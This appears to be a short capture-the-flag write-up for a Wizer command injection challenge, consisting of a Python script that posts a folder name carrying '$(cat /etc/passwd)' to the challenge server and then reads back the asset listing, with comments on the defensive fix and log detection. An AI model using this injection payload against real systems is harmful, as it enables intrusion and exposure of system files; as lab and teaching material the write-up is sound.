Wizer - Challenge 12 - Command Injection

Exploit

import requests

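# Base URL of the Wizer CTF challenge instance this write-up targets.
url = "https://chal12.vercel.app"

# UUID-shaped company id sent with both requests below.
COMPANY_ID = "abababab-abab-0aba-Abab-abababababab"

# requests applies no timeout by default, so a stalled connection would
# block the script forever; bound each call instead.
TIMEOUT_SECONDS = 10

# The original write-up names this endpoint here but sends nothing to it.
# /getCompanyLogo

# Step 1: register an assets folder whose name carries shell syntax.
# `$(...)` is shell command substitution and the trailing `#` starts a shell
# comment. This only has an effect if the server places the value unquoted
# into a shell command line -- presumably what the challenge does; the
# server code is not shown on this page.
#
# Defensive takeaway: a folder name is data, not code. Create it through a
# filesystem API (or pass it as a single argv element with no shell), and
# reject anything outside a strict allow-list of characters before use.
# For detection, path-like JSON fields containing `$(`, backticks, `;`, `|`
# or `#` are a useful signal in request logs.
add_folder_response = requests.post(
    url + "/addAssetsFolder",
    json={
        "companyId": COMPANY_ID,
        "folder": "a $(cat /etc/passwd) #",
    },
    timeout=TIMEOUT_SECONDS,
)
print(add_folder_response.text)

# Step 2: read back the asset listing for the same company. Presumably the
# result of step 1 surfaces in this response -- confirm against the
# challenge source.
assets_response = requests.post(
    url + "/companyAssets",
    json={"companyId": COMPANY_ID},
    timeout=TIMEOUT_SECONDS,
)
print(assets_response.text)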